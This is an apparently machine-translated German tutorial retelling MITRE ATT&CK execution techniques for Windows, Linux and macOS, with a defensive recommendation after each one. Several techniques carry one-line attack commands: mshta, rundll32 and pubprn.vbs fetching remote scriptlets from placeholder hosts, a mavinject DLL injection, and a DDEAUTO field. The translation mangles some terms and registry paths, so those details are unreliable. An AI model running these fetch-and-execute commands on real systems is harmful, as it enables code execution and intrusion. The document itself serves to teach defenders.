Wir untersuchen gegnerische Taktiken, Techniken und allgemeines Wissen (ATT @ CK). Unternehmensstrategien. Teil 2

  • Tutorial

Ausführung


Links zu allen Teilen:
Teil 1. Ermitteln des ersten Zugriffs (Erstzugriff)
Teil 2. Ausführung (Ausführung)
Teil 3. Konsolidierung (Persistenz)
Teil 4. Privilegieneskalation
Teil 5. Verteidigungsumgehung
Teil 6. Anfordern von Anmeldeinformationen (Zugriff auf Anmeldeinformationen)
Teil 7. Erkennung ( Ermittlung )
Teil 8. Laterale Bewegung

In der Phase "Ausführung" werden die Mittel und Methoden der Remote- und lokalen Ausführung verschiedener Befehle, Skripts und ausführbaren Dateien durch einen Angreifer beschrieben. Dateien, die ihm beim vorherigen geliefert wurden ne

Der Autor ist nicht für die möglichen Folgen der Anwendung der in dem Artikel enthaltenen Informationen verantwortlich und entschuldigt sich auch für etwaige Ungenauigkeiten in einigen Formulierungen und Bedingungen. Die veröffentlichten Informationen sind eine kostenlose Nachzählung von MITRE ATT & CK- Inhalten .

AppleScript


System: macOS
Berechtigungen: Benutzerbeschreibung
: Die AppleScript-Sprache kann mit Apple Event-Nachrichten arbeiten, die zwischen Anwendungen im Rahmen der Interprozesskommunikation (IPC) ausgetauscht werden. Mit Apple Event können Sie mit fast allen Anwendungen interagieren, die lokal oder remote geöffnet sind, und Ereignisse auslösen, z. B. das Öffnen von Fenstern und das Drücken von Tasten. Skripts werden mit dem folgenden Befehl ausgeführt: Osascript -e <script> .
Angreifer können AppleScript verwenden, um SSH-Verbindungen zu Remote-Hosts zu öffnen, um Benutzern gefälschte Dialogfelder zur Verfügung zu stellen. AppleScript kann auch bei häufigeren Arten von Angriffen verwendet werden, beispielsweise bei der Reverse Shell-Organisation.

Schutzempfehlungen: Obligatorische Überprüfung der Ausführung von AppleScript-Skripts für die Signatur eines vertrauenswürdigen Entwicklers.

CMSTP (AppLocker ByPass - CMSTP)


System: Windows
Berechtigungen: Benutzer
Beschreibung: Das Microsoft Connection Manager-Profilinstallationsprogramm (cmstp.exe) ist das in Windows integrierte " Connection Manager-Profilinstallationsprogramm ". Cmstp.exe kann eine inf-Datei als Parameter verwenden, sodass ein Angreifer ein spezielles böswilliges INF für das Laden und Ausführen von DLLs oder Scriptlets (* .sct) von Remote-Servern vorbereiten kann, wobei AppLocker und andere Sperren umgangen werden, da cmstp.exe mit einem digitalen Microsoft-Zertifikat signiert ist.

Schutzempfehlungen: Blockieren des Starts potenziell gefährlicher Anwendungen. Führt die Überwachung von C: \ Windows \ System32 \ cmstp.exe aus .

Befehlszeilenschnittstelle (Befehlszeilenschnittstelle)


System: Windows, Linux, macOS
Berechtigungen: Benutzer, Administrator,
Systembeschreibung: Sie können lokal mit der Befehlszeilenschnittstelle kommunizieren, Remote-Zugriffssoftware verwenden, Reverse Shell usw. verwenden. Befehle werden mit der aktuellen Berechtigungsstufe des Befehlszeilenschnittstellenprozesses ausgeführt, wenn der Befehl keinen Prozessaufruf enthält, der die Berechtigungen zum Ausführen des Befehls ändert (z. B. eine geplante Task).

Sicherheitstipps: Überwachung und / oder Befehlszeilenblockierung mithilfe von Tools wie AppLocker oder Richtlinien für Softwareeinschränkungen.

Elemente der Systemsteuerung (Elemente der Windows-Systemsteuerung)


System: Windows
Berechtigungen: Benutzer, Administrator,
Systembeschreibung: Die Taktik besteht darin, den Angreifern die Verwendung von Elementen der Windows-Systemsteuerung zu ermöglichen, um beliebige Befehle (z. B. den Reaver- Virus ) als Nutzlast auszuführen . Schädliche Objekte können als Standardsteuerelemente getarnt und mithilfe von Phishing-Anhängen an das System übermittelt werden. Dienstprogramme zum Anzeigen und Konfigurieren von Windows-Einstellungen sind registrierte Exe-Dateien und CPL-Dateien von Windows-Bedienfeldelementen. CPL-Dateien sind eigentlich DLLs, die auf folgende Weise ausgeführt werden können:
  • direkt von der Befehlszeile aus: control.exe <file.cpl> ;
  • Verwendung von API-Funktionen aus shell32.dll: rundll32.exe shell32.dll, Control_RunDLL <file.cpl> ;
  • Doppelklicken Sie auf die CPL-Datei.

In System32 gespeicherte registrierte CPLs werden automatisch in der Windows-Systemsteuerung angezeigt und verfügen über eine eindeutige Kennung, die in der Registrierung gespeichert ist:
HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ Windows \ CurrentVersion \ Explorer \ ControlPanel \ NameSpace

Informationen zu anderen CPLs , z. B. Anzeigename und cpl-Pfad -Dateien in Unterabschnitten gespeichert «Cpls» und «Erweiterte Eigenschaften» Abschnitt:
HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ Windows \ Currentversion \ Plesk Panel der Steuerung

Einige der CPL, durch ein Kommando - Shell ausführen, registrierten unter:
HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ Windows \ Currentversion \ Controls Ordner \ {Name} \ Shellex \ PropertySheetHandlers

Protection-Empfehlung:Einschränkung beim Starten und Speichern von Control Panel-Dateien nur in geschützten Ordnern (z. B. C: \ Windows \ System32 ), einschließlich der Benutzerkontensteuerung (UAC) und AppLocker, um nicht autorisierte Änderungen am System zu verhindern. Natürlich die Verwendung von Antivirensoftware.

Dynamic Data Exchange Protocol (DDE), Makrofreier Code-Exec in MSWord


System: Windows
Berechtigungen: Benutzer
Beschreibung: DDE ist ein Anwendungsinteraktionsprotokoll, das Daten und gemeinsam genutzten Speicher für Messaging freigibt. Ein Word-Dokument kann beispielsweise eine Tabelle enthalten, die automatisch aus einem Excel-Dokument aktualisiert wird. Bei dieser Technik wird eine Sicherheitsanfälligkeit in MS Office-Anwendungen ausgenutzt, die sich auf die Verwendung des DDE-Protokolls in MS Office bezieht. Schädliche Benutzer können Objekte in MS Office-Dokumente einbetten, die Befehle enthalten, die beim Öffnen des Dokuments ausgeführt werden. Ein Word-Dokument kann beispielsweise ein Field-Objekt (Field) enthalten, in dessen Wert der Befehl {DDEAUTO < angegeben ist , beispielsweise c: \ windows \ system32 \ cmd.exe>}wird beim Öffnen eines Dokuments ausgeführt. Trotz des Verlusts der Relevanz kann DDE auch in Windows 10 und MS Office 2016 mit Hilfe des Schlüssels
aktiviert werden : AllowDDE (DWORD) = 2 im Registrierungsabschnitt:
HKEY_CURRENT_USER \ Software \ Microsoft \ Office \ <Office-Version \ Word \ Sicherheit .

Sicherheitstipps: Folgen Sie den Empfehlungen von Microsoft und installieren Sie das entsprechende MS Office-Update . In Windows 10 können Sie auch den Parameter ASR (Attack Surface Reduction) aktivieren , um sich vor DDE-Angriffen und dem Hervorbringen von untergeordneten Prozessen durch MS Office-Anwendungen zu schützen.

Ausführung über API (Ausführung über API)


System: Windows-
Rechte: Benutzer, Administrator,
Systembeschreibung: Angreifer können die API verwenden, um Binärdateien auszuführen. API-Funktionen wie CreateProcess ermöglichen es Programmen und Skripts, Prozesse mit den erforderlichen Pfaden und Argumenten zu starten. API-Funktionen, die zum Ausführen von Binärdateien verwendet werden können:
  • CreateProcessA (), CreateProcessW ();
  • CreateProcessAsUserA (), CreateProcessAsUserW ();
  • CreateProcessInternalA (), CreateProcessInternalW ();
  • CreateProcessWithLogonW (), CreateProcessWithTokenW ();
  • LoadLibraryA (), LoadLibraryW ();
  • LoadLibraryExA (), LoadLibraryExW ();
  • LoadModule ();
  • LoadPackagedLibrary ();
  • WinExec ();
  • ShellExecuteA (), ShellExecuteW ();
  • ShellExecuteExA (), ShellExecuteExW ().


Sicherheitstipps: Aufrufe von API-Funktionen sind üblich und von böswilligen Aktivitäten nur schwer zu unterscheiden. Der Schutzvektor sollte darauf abzielen, zu verhindern, dass der Angreifer am Anfang der Angriffskette Werkzeuge startet, schädliches Verhalten erkennt und möglicherweise gefährliche Software blockiert.

Ausführung über den Windows Modul Loader (Ausführung durch Modul Load)


System: Windows-
Rechte: Benutzer
Beschreibung: Es ist möglich, die Ausführung des Codes mit dem Windows-Modul-Ladeprogramm NTDLL.dll zu organisieren, das die DLL-Bibliothek auf einem beliebigen lokalen Pfad oder Netzwerkpfad laden kann. NTDLL.dll ist Teil der Windows-API und kann Funktionen wie CreateProcess () und LoadLibrary () aufrufen .

Schutzempfehlungen: Aufrufe an API-Funktionen sind Standardfunktionen des Betriebssystems, die sich nur schwer von böswilligen Aktivitäten unterscheiden lassen. Der Schutzvektor sollte darauf abzielen, zu verhindern, dass der Angreifer am Anfang der Angriffskette Werkzeuge startet. Es ist sinnvoll, das Laden von DLLs mit den Verzeichnissen % SystemRoot% und % ProgramFiles% zu beschränken.

Nutzung für die Client-Ausführung


System: Windows, Linux, macOS
Berechtigungen: Benutzerbeschreibung
: Die Technik umfasst die Remote-Code-Ausführung unter Verwendung von Exploits in der Anwendersoftware. Das Vorhandensein von Sicherheitslücken in Software ist häufig mit der Verletzung der Softwareanforderungen einer sicheren Programmierung durch Softwareentwickler verbunden, was letztendlich dazu führen kann, dass unerwartetes Softwareverhalten verursacht wird.
Betrachten Sie einige Arten von Exploits:
  • Browser-Exploits Webbrowser werden anvisiert, wenn böswillige Angreifer Shadow-Downloads und Phishing-Links verwenden. Das angegriffene System kann durch einen normalen Browser gefährdet werden, nachdem der Benutzer bestimmte Aktionen ausgeführt hat, z. B. das Klicken auf den im Phishing-Brief angegebenen Link.
  • Office-Anwendungs-Exploits. Schädliche Dateien werden als Anhänge oder Download-Links übertragen. Um die Sicherheitsanfälligkeit auszunutzen, muss der Benutzer das Dokument oder die Datei öffnen, um den Exploit zu starten.
  • Anwendungen von Drittanbietern. Häufige Anwendungen wie Adobe Reader und Flash, die häufig in Unternehmensumgebungen eingesetzt werden, werden von Eindringlingen als Ziel ausgewählt. Abhängig von der Software und der Art der Sicherheitsanfälligkeit werden Sicherheitsanfälligkeiten im Browser ausgenutzt. Wenn ein Benutzer eine Datei öffnet, können Flash-Objekte beispielsweise in MS Office-Dokumenten bereitgestellt werden.


Schutzempfehlungen: Rechtzeitige Installation von Updates, die von Anwendungen verwendet werden. Die Verwendung verschiedener Isolationsmittel für potenziell anfällige Anwendungen - Sandboxen, Mikrosegmentierung und Virtualisierungstools, beispielsweise Sandboxie für Windows und Apparmor, Docker für Linux. Es wird auch empfohlen, Systeme zum Schutz vor Exploits zu verwenden, z. B. Windows Defender Exploit Guard (WDEG) für Windows 10 oder Enhanced Mitigation Experience Tool (EMET) für frühere Windows-Versionen.

Grafische Benutzeroberfläche


System: Windows, Linux, macOS
Berechtigungen: Benutzer, Administrator, System
Beschreibung: Eine ausführbare Datei oder ein Skript wird gestartet, wenn Sie mit einer Datei über eine grafische Benutzeroberfläche (GUI) in einer interaktiven oder Remote-Sitzung interagieren, z. B. über das RDP-Protokoll.

Sicherheitstipps: Schützen Sie Anmeldeinformationen, die für die Remote-Verbindung zum System verwendet werden können. Identifizieren Sie nicht benötigte Systemdienstprogramme, Software von Drittanbietern, mit der Sie den interaktiven Remote-Modus aufrufen können.

InstallUtil


System: Windows
Berechtigungen: Benutzer
Beschreibung: InstallUtil ist ein Windows-Befehlszeilenprogramm, mit dem Anwendungen installiert und deinstalliert werden können, die den .NET Framework-Spezifikationen entsprechen. Installutil wird automatisch mit VisualStudio installiert. Die Datei InstallUtil.exe ist mit einem Microsoft-Zertifikat signiert und wird in folgendem Verzeichnis gespeichert:
C: \ Windows \ Microsoft .NET \ Framework \ Version [Version] \ InstallUtil.exe.
Angreifer können die InstallUtil-Funktionalität verwenden, um die Code-Ausführung von Proxy auszuführen und White-Letter-Anwendungen zu umgehen. Sicherheitstipps

: Ihr InstallUtil kann auf Ihrem System möglicherweise nicht verwendet werden. Daher sollten Sie den Start von InstallUtil.exe blockieren.

LSASS-Treiber (LSASS-Treiber)


System: Windows
Berechtigungen: Administrator, System
Beschreibung: Local Security Authority (LSA) ist ein Windows-Subsystem, das Benutzerauthentifizierung bereitstellt. LSA enthält mehrere dynamisch miteinander verbundene DLLs, die im Prozess LSASS.exe ausgeführt werden. Angreifer können LSASS.exe angreifen, indem sie unzulässige LSA-Treiber ersetzen oder hinzufügen und dann beliebigen Code ausführen. Die Technik ist in der Pasam- und Wingbird-Malware implementiert, die die beim Laden von LSASS verwendeten DLLs „spiegeln“. In diesem Fall wird der Schadcode ausgeführt, bevor eine unzulässige DLL einen Absturz und einen nachfolgenden Absturz des LSASS-Dienstes verursacht.

Schutzempfehlungen:Aktivieren Sie in Windows 8.1 und Windows Server 2012 R2 den LSA-Schutz, indem Sie den Registrierungsschlüssel
festlegen : HKEY_LOCAL_MACHINE \ SYSTEM \ CurrentControlSet \ Control \ Lsa \ RunAsPPL
in dword: 00000001

Dieser Schutz stellt sicher, dass die heruntergeladenen LSA-Plug-Ins und -Treiber mit einer digitalen Signatur von Microsoft signiert werden. Aktivieren Sie in Windows 10 und Server 2016 Windows Defender Credential Guard , um lsass.exe in einer isolierten virtuellen Umgebung auszuführen. Aktivieren Sie den sicheren DLL-Suchmodus, um das Risiko zu verringern, dass schädliche Bibliotheken in lsass.exe geladen werden:
HKEY_LOCAL_MACHINE \ System \ CurrentControlSet \ Control \ Session Manager \ SafeDllSearchMode .

Launchctl


System: macOS
Berechtigungen: Benutzer, Administrator
Beschreibung: Launchctl ist ein Dienstprogramm zum Verwalten des Launchd-Diensts. Mit Launchctl können Sie System- und Benutzerdienste (LaunchDeamons und LaunchAgents) verwalten sowie Befehle und Programme ausführen. Launchctl unterstützt Befehlszeilen-Unterbefehle, die interaktiv oder von der Standardeingabe umgeleitet werden:
launchctl submit -l [Labelname] - / Pfad / zu / thing / nach / Ausführen '' arg '' 'arg' '' arg ' .
Starten und Neustarten von Services und Fehlfunktionen können Code ausführen und sogar die Whitelist umgehen, wenn Launchctl ein autorisierter Prozess ist. Das Laden, Entladen und Laden von Diensten und Daemons erfordert jedoch möglicherweise höhere Berechtigungen.

Einschränken der Benutzerrechte zum Erstellen von Launch Agents und Starten von Launch Deamons mithilfe von Gruppenrichtlinien. Mit der KnockKnock- App können Sie Programme entdecken, die launchctl zum Verwalten von Launch Agents und Launch Deamons verwenden.

Ausführung mit lokalen Einplanungstasks (Local Job Scheduling)


System: Linux, macOS
Berechtigungen: Benutzer, Administrator, root
Beschreibung: Angreifer können auf den angegriffenen Systemen Aufgaben erstellen, um den unbefugten Start von Programmen zu ermöglichen, wenn das System gestartet wird oder nach einem Zeitplan ausgeführt wird. Linux- und Apple-Systeme unterstützen verschiedene Methoden zum Planen periodischer Hintergrundaufgaben: cron, at, launchd. Im Gegensatz zum Windows Task Scheduler kann die Taskplanung auf Linux-Systemen nicht remote ausgeführt werden, außer, dass Remote-Sitzungen wie SSH verwendet werden.

Sicherheitstipps: Beschränken der Benutzer auf das Erstellen geplanter Aufgaben, Blockieren von Systemdienstprogrammen und anderer Software, die zum Planen von Aufgaben verwendet werden können.

Mshta


System: Windows
Berechtigungen: Benutzer
Beschreibung: Mshta.exe (in C: \ Windows \ System32 \ ) ist ein Dienstprogramm, das Microsoft HTML-Anwendungen (* .HTA) ausführt. HTA-Anwendungen werden mit denselben Technologien ausgeführt, die InternetExplorer verwendet, jedoch außerhalb des Browsers. Aufgrund der Tatsache, dass Mshta Dateien unter Umgehung der Browser-Sicherheitseinstellungen verarbeitet, können Angreifer mithilfe von mshta.exe schädliche HTA-Dateien (Javascript oder VBScript) verwenden. Eine schädliche Datei kann mit dem integrierten Skript gestartet werden:
mshta vbscript: Close (Ausführen ("GetObject (" "" "script: https [:] // webserver / payload [.] Sct" ")"))

oder direkt unter der URL:
mshta http [:] // webserver / payload [.] hta

Sicherheitstipps: Die Funktion mshta.exe ist mit älteren Versionen von IE verknüpft, die das Ende ihres Lebenszyklus erreicht haben. Blockieren Sie Mshta.exe, wenn Sie dessen Funktionalität nicht verwenden.

Powershell


System: Windows
Berechtigungen: Benutzer, Administrator
Beschreibung: PowerShell (PS) ist eine leistungsstarke interaktive Befehlszeilenschnittstelle und Skriptumgebung, die in Windows enthalten ist. Angreifer können mit PS Informationen sammeln und Code ausführen. Das Cmdlet Start-Process kann beispielsweise eine ausführbare Datei ausführen. Das Cmdlet Invoke-Command führt einen Befehl lokal oder auf einem Remotecomputer aus. PS kann auch zum Herunterladen und Ausführen von ausführbaren Dateien aus dem Internet verwendet werden, ohne sie auf der Festplatte zu speichern. Für Remoteverbindungen mit PS sind Administratorrechte erforderlich. Es gibt eine Reihe von Tools zum Angriff auf PS:

Schutztipps: PS kann aus dem System entfernt werden, wenn dies nicht erforderlich ist. Wenn PS erforderlich ist, sollten Sie die Möglichkeit der Administratoren einschränken, es auszuführen und nur signierte Skripts auszuführen. Deaktivieren Sie den WinRM-Dienst, um die Remote-Ausführung von PS-Skripts zu verhindern. Es sollte beachtet werden, dass es Möglichkeiten gibt, die Richtlinien zum Ausführen von PS-Skripts zu umgehen .

Regsvcs / Regasm


System: Windows
Berechtigungen: Benutzer, Administrator
Beschreibung: Regsvcs und Regasm sind Windows-Dienstprogramme, die zur Registrierung im COM-Assembly-System von .NET Component Object Model verwendet werden. Beide Dateien werden von Microsoft digital signiert. Kriminelle können Regsvcs und Regasm zum Proxy-Code verwenden, wenn der Code, der vor der Registrierung oder Aufhebung der Registrierung ausgeführt werden muss, als Attribut angegeben wird: [ComRegisterFunction] oder [ComUnregisterFunction]. Code mit solchen Attributen kann auch dann ausgeführt werden, wenn der Prozess mit unzureichenden Berechtigungen ausgeführt wird oder sogar beim Start abstürzt.

Sicherheitstipps: Blockieren Sie Regsvcs.exe und Regasm.exe, wenn sie nicht in Ihrem System oder Netzwerk verwendet werden.

Regsvr32 (Squiblydoo)


System: Windows
Berechtigungen: Benutzer, Administrator
Beschreibung: Regsvr32.exe ist ein Konsolendienstprogramm zum Registrieren und Aufheben der Registrierung von OLE-Steuerelementen in der Registrierung, z. B. ActiveX- und DLL-Bibliotheken. Regsvr32.exe ist von Microsoft digital signiert und kann zur Proxy-Code-Ausführung verwendet werden. Mit Regsvr32 können Sie beispielsweise eine XML-Datei laden, die Teile des Java-Codes (Scriptlets) enthält, die ausgeführt werden, um die weiße Liste zu umgehen.

Schutzempfehlungen: Angriffsflächenreduzierung (ASR) in EMET und erweiterter Theart-Schutz in Windows Defender kann die Verwendung von Regsvr32.exe blockieren, um Whitelists zu umgehen.

Rundll32 (Poweliks)


System: Windows
Berechtigungen: Benutzer
Beschreibung: Rundll32.exe ist ein Systemdienstprogramm zum Ausführen von Programmen in Dynamic Link Libraries, die zum Proxyieren einer Binärdatei aufgerufen werden können. Führen Sie Windows-Steuerungsdateien (.cpl) über undokumentierte Funktionen von shel32.dll aus. Control_RunDLL und Control_RunDLLAsUser . Wenn Sie auf die .cpl-Datei doppelklicken, wird auch Rundll32.exe ausgeführt. Rundll32 kann auch zum Ausführen von Skripts wie javascript verwendet werden:
rundll32.exe javascript: "\ .. \ mshtml, RunHTMLApplication"; document.write (); GetObject ("scrirpt: https [:] // www [.] Beispiel [ .] com / bacter.sct ")"
Die oben beschriebene Methode zur Verwendung von rundll32.exe wird von Antivirensoftware wie einem Virus wie Poweliks erkannt.
Schutztipps: ASR (Attack Surface Reduction) in EMET und der erweiterte Schutz in Windows Defender kann die Verwendung von Rundll32.exe blockieren, um Whitelists zu umgehen.

Ausführen mit Windows-Aufgabenplanung (geplante Aufgabe)


System: Windows
Berechtigungen: Benutzer, Administrator, Systembeschreibung
: Dienstprogramme wie at, schtasks und Windows Task Scheduler können verwendet werden, um den Start von Programmen und Skripts zu planen, die zu einem bestimmten Zeitpunkt ausgeführt werden. Die Task kann auf dem Remote-System geplant werden, vorausgesetzt, RPC wird zur Authentifizierung verwendet und die Drucker- und Dateifreigabe ist aktiviert. Darüber hinaus ist eine Administratorplanung erforderlich, um Aufgaben auf dem Remote-System zu planen. Angreifer können die Remote-Task-Planung verwenden, um Programme beim Systemstart oder im Kontext eines bestimmten Kontos auszuführen.

Schutzempfehlungen: Aktivieren Sie die Einschränkung der Rechte zum Erstellen von Jobs durch Benutzer im Namen von System in der Registrierung:
HKLM \ SYSTEM \ CurrentControlSet \ Control \ Lsa \ SubmitControl = 0
Hinweis: Mit SubmitControl = 1 können die Mitglieder der Gruppe Server-Operatoren die Joberstellung erstellen .

Konfigurieren Sie auch das entsprechende Gruppenrichtlinienobjekt:
Computerkonfiguration> Richtlinien> Windows-Einstellungen> Sicherheitseinstellungen> Richtlinien
> Sicherheitseinstellungen> Lokale Einstellungen Richtlinien>
Zuweisen von Benutzerrechten: Erhöhen der Planungspriorität Berücksichtigen Sie bei seinen Aktivitäten die Machbarkeit des PowerSploit Framework, das das PowerUP-Modul zum Auffinden von Schwachstellen in geplanten Taskberechtigungen enthält.

Scripting


System: Windows, Linux, macOS
Berechtigungen: Benutzerbeschreibung
: Angreifer können Skripts verwenden, um ihre Aktionen zu automatisieren, betriebliche Aufgaben zu beschleunigen und dadurch die Zugriffszeit zu verkürzen. Einige Skriptsprachen können verwendet werden, um die Überwachungsmechanismen der Prozesse zu umgehen, indem auf API-Ebene direkt mit dem Betriebssystem interagiert wird, anstatt andere Programme aufzurufen. Skripts können als Makros in Office-Dokumente eingebettet und dann für einen Phishing-Angriff verwendet werden. In diesem Fall rechnen die Angreifer damit, dass der Benutzer eine Datei mit einem Makro startet oder dass der Benutzer damit einverstanden ist, das Makro zu aktivieren. Es gibt mehrere gängige Skript-Frameworks - Metasploit, Veil, PowerSploit.

Sicherheitstipps: Beschränken Sie den Zugriff auf Skripts wie VBScript oder PowerShell. Konfigurieren Sie unter Windows die Sicherheitseinstellungen von MS Office, indem Sie die sichere Anzeige aktivieren und Makros über das Gruppenrichtlinienobjekt deaktivieren. Wenn Makros benötigt werden, dürfen nur signierte, digital signierte Makros ausgeführt werden. Verwenden Sie Mikrosegmentierung und Anwendungsvirtualisierung, z. B. Sandboxie für Windows und Apparmor, Docker für Linux.

Start der Dienste (Service Execution)


System: Windows
Berechtigungen: Administrator, System
Beschreibung: Angreifer können mithilfe von speziellen Methoden der Interaktion mit Windows-Diensten Binärcode, Befehle oder Skripts ausführen, z. B. mit dem Service Management Manager (SCM). Sie können neue Dienste erstellen und laufende Dienste ändern.

Schutzempfehlungen:Stellen Sie sicher, dass die aktuelle Systemberechtigung verhindert, dass Benutzer mit niedrigen Berechtigungen Dienste mit hohen Berechtigungen starten. Stellen Sie sicher, dass ausführbare Dateien mit hohen Berechtigungen im System nicht von Benutzern mit niedrigeren Berechtigungen ersetzt oder geändert werden können. Erwägen Sie die Verwendung von Tools, um den Start potenziell gefährlicher Programme mit AppLocker zu beschränken und Richtlinien für Softwareeinschränkungen ( Softwareeinschränkungsrichtlinien) festzulegen .

Ausführung durch signierte Binärdateien (signierte binäre Proxy-Ausführung)


System: Windows
Berechtigungen: Benutzer
Beschreibung: Binärdateien, die mit vertrauenswürdigen digitalen Zertifikaten signiert sind, können auf Windows-Systemen ausgeführt werden, die durch Überprüfung der digitalen Signatur geschützt sind. Bei der Installation von Windows können mehrere von Microsoft standardmäßig signierte Dateien zum Ausführen anderer Dateien verwendet werden:
Mavinject.exe ist ein Windows-Dienstprogramm, mit dem Sie Code ausführen können. Mit Mavinject kann eine DLL in einen laufenden Prozess eingegeben werden:
"C: \ Programme \ Gemeinsame Dateien \ microsoft shared \ ClickToRun \ MavInject32.exe" [PID] / INJECTRUNNING [PFAD-DLL]
C: \ Windows \ system32 \ mavinject.exe [PID ] / INJECTRUNNING [PFAD DLL]
SyncAppvPublishingServer.exe- kann verwendet werden, um Powershell-Skripts auszuführen, ohne Powershell.exe auszuführen.
Es gibt mehrere ähnliche Binärdateien .

Sicherheitstipps: Viele signierte Dateien werden möglicherweise nicht auf Ihrem System verwendet. Daher sollten Sie den Start blockieren.

Ausführung durch signierte Skripts (Proxy-Ausführung mit signiertem Skript)


System: Windows
Berechtigungen: Benutzer
Beschreibung: Mit vertrauenswürdigen Zertifikaten signierte Skripts können verwendet werden, um schädliche Dateien weiterzuleiten. Beispielsweise ist die Datei PubPrn.vbs mit einem Microsoft-Zertifikat signiert und kann zum Starten einer Datei von einem Remote-Server aus verwendet werden:
cscript C: \ Windows \ System32 \ Printing_Admin_Scripts \ ru-RU \ pubprn.vbs 127.0.0.1 script: http [:] // 192.168.1.100/hi.png

Sicherheitsempfehlungen: Solche signierten Skripts sind auf Ihrem System möglicherweise nicht erforderlich. Daher sollten Sie den Start blockieren.

Quellteam


System: Linux und macOS
Berechtigungen: Benutzerbeschreibung
: Source ist ein Befehl, mit dem Sie alle Befehle aus einer angegebenen Datei in der aktuellen Befehlsshell lesen und ausführen können. Dies bedeutet, dass alle angegebenen Umgebungsvariablen in allen zu startenden Skripts und Befehlen sichtbar sind. Source kann auf zwei Arten gestartet werden:
source / path / to / filename [Argumente] oder . / path / to / filename [Argumente]
Beachten Sie das Leerzeichen nach dem Punkt. Ohne Leerzeichen wird das Programm in einer neuen Befehlsshell ausgeführt. Angreifer können mithilfe von Source Dateien ausführen, die nicht mit dem Kennzeichen „x“ gekennzeichnet sind, als ausführbare Datei.

Schutzempfehlungen: Die Verwendung von integrierten Befehlen im System zu verhindern, ist aufgrund ihrer Rechtmäßigkeit ziemlich schwierig. Daher muss der Schutzvektor darauf abzielen, böswillige Aktionen in früheren Angriffsphasen zu verhindern, beispielsweise in der Zustellungsphase oder zum Erstellen einer schädlichen Datei im System.

Leerzeichen nach Dateiname (Leerzeichen nach Dateiname)


System: Linux, macOS
Berechtigungen: Benutzerbeschreibung
:Kriminelle können den wahren Dateityp ausblenden, indem Sie die Erweiterung ändern. Bei bestimmten Dateitypen (funktioniert nicht mit .app-Dateien) wird durch das Hinzufügen eines Leerzeichens am Ende des Dateinamens die Art und Weise geändert, in der das Betriebssystem die Datei verarbeitet. Wenn zum Beispiel eine ausführbare Mach-O-Datei namens evil.bin vorhanden ist, startet der Benutzer, wenn er auf das Betriebssystem doppelklickt, Terminal.app und startet es. Wenn dieselbe Datei in evil.txt umbenannt wird, wird sie beim Doppelklicken in einem Texteditor gestartet. Wenn die Datei jedoch in "evil.txt" (Leerzeichen am Ende) umbenannt wird, wird das Betriebssystem durch Doppelklicken auf den Typ der True-Datei bestimmt, und die Binärdatei wird gestartet. Angreifer können diese Technik verwenden, um einen Benutzer zu täuschen und eine schädliche ausführbare Datei zu starten.

Schutzempfehlungen:Die Verwendung dieser Technik ist schwer zu verhindern, weil Da ein Angreifer reguläre Betriebssystemmechanismen verwendet, muss der Schutzvektor darauf abzielen, böswillige Aktionen in früheren Phasen des Angriffs zu verhindern, beispielsweise in der Zustellungsphase oder zum Erstellen einer schädlichen Datei im System.

Ausführen mit Netzwerkverwaltungssoftware von Drittanbietern (Drittanbietersoftware)


System: Windows, Linux, macOS
Berechtigungen: Benutzer, Administrator,
Systembeschreibung: Der Angriffsvektor richtet sich an Software und Software-Bereitstellungssysteme von Drittanbietern, die im angegriffenen Netzwerk für administrative Zwecke verwendet werden (SCCM, VNC, HBSS, Altris usw.). Wenn ein Angreifer Zugriff auf solche Systeme erhält, kann der Angreifer Code auf allen mit dem Software-Bereitstellungssystem verbundenen Hosts remote ausführen. Die für die Implementierung dieser Technologie erforderlichen Rechte hängen von der spezifischen Konfiguration der Systeme ab. Lokale Anmeldeinformationen sind möglicherweise ausreichend, um auf den Software-Bereitstellungsserver zuzugreifen. Möglicherweise ist jedoch ein Administratorkonto erforderlich, um die Software-Bereitstellung auszuführen.

Schutzempfehlungen:Überprüfen Sie die Sicherheitsstufe Ihrer Software-Bereitstellungssysteme. Stellen Sie sicher, dass der Zugriff auf Software-Managementsysteme begrenzt, kontrolliert und geschützt ist. Verwenden Sie die Richtlinie der obligatorischen vorherigen Genehmigung der Remote-Softwarebereitstellung. Ermöglichen Sie einer begrenzten Anzahl von Administratoren den Zugriff auf Software-Bereitstellungssysteme. Stellen Sie die Isolierung des Software-Bereitstellungssystems sicher. Stellen Sie sicher, dass die Zugangsdaten für das Software-Bereitstellungssystem eindeutig sind und nicht in anderen Diensten des Unternehmensnetzwerks verwendet werden. Wenn das Software-Bereitstellungssystem so konfiguriert ist, dass nur signierte Binärdateien ausgeführt werden, überprüfen Sie, ob vertrauenswürdige Zertifikate nicht im Software-Bereitstellungssystem selbst gespeichert sind, sondern sich in einem System befinden, auf das nicht remote zugegriffen werden kann.

Trap Team


System: Linux, macOS
Berechtigungen: Benutzer, Administrator
Beschreibung: Mit dem Trap-Befehl wird das Skript vor Unterbrechungen geschützt (Strg + C, Strg + D, Strg + Z usw.). Wenn das Skript ein Interrupt-Signal empfängt, das in den Argumenten des Trap-Befehls angegeben ist, verarbeitet es das Interrupt-Signal selbst, und die Befehlsshell verarbeitet ein solches Signal nicht. Angreifer können mithilfe von Trap Code registrieren, der ausgeführt wird, wenn die Shell bestimmte Interrupt-Signale empfängt.

Schutzempfehlungen:Die Verwendung dieser Technik ist schwer zu verhindern, da der Angreifer reguläre Betriebssystemmechanismen verwendet. Der Schutzvektor sollte darauf abzielen, böswillige Aktionen in früheren Stadien eines Angriffs zu verhindern, beispielsweise in der Zustellungsphase oder zum Erstellen einer bösartigen Datei im System.

Ausführung durch vertrauenswürdige Softwareentwicklungsdienstprogramme (Trusted Developer Utilities)


System: Windows
Berechtigungen: Benutzerbeschreibung
: Es gibt viele Dienstprogramme, die von Softwareentwicklern verwendet werden und zum Ausführen von Code in verschiedenen Formen während der Softwareentwicklung, beim Debugging und beim Reverse Engineering verwendet werden können. Diese Dienstprogramme werden häufig mit digitalen Zertifikaten signiert, die es ihnen ermöglichen, im Betriebssystem bösartigen Code auszuführen, wobei die Schutzmechanismen und White-Sheets von Anwendungen umgangen werden.

